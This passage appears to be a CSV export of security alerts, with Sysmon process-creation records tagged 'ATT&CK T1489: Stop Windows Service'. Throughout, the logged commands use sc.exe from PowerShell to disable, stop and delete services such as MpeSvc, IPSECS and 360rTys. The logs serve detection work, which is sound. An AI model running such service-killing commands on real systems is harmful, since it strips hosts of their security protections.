""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config MpeSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.863600200Z"",""eventRecordID"":""3215"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.860\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00}\r\nProcessId: 6328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config MpeSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.860"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00}"",""processId"":""6328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config MpeSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.177",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.818 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010064e2b00} +ProcessId: 7644 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.824021700Z"",""eventRecordID"":""3213"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.818\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010064e2b00}\r\nProcessId: 7644\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.818"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010064e2b00}"",""processId"":""7644"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.131",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.717 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010544b2b00} +ProcessId: 5372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.723147400Z"",""eventRecordID"":""3210"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.717\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010544b2b00}\r\nProcessId: 5372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:29.717"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010544b2b00}"",""processId"":""5372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.085",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.683 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bb492b00} +ProcessId: 8172 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.688090500Z"",""eventRecordID"":""3208"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.683\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bb492b00}\r\nProcessId: 8172\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.683"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010bb492b00}"",""processId"":""8172"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.076",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.666 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd482b00} +ProcessId: 7356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.668724000Z"",""eventRecordID"":""3207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.666\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd482b00}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.666"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010dd482b00}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.039",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.552 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010f0452b00} +ProcessId: 7964 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.557402100Z"",""eventRecordID"":""3204"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.552\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010f0452b00}\r\nProcessId: 7964\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.552"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010f0452b00}"",""processId"":""7964"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.840",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.408 
+ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010ab422b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.416042400Z"",""eventRecordID"":""3201"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.408\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010ab422b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 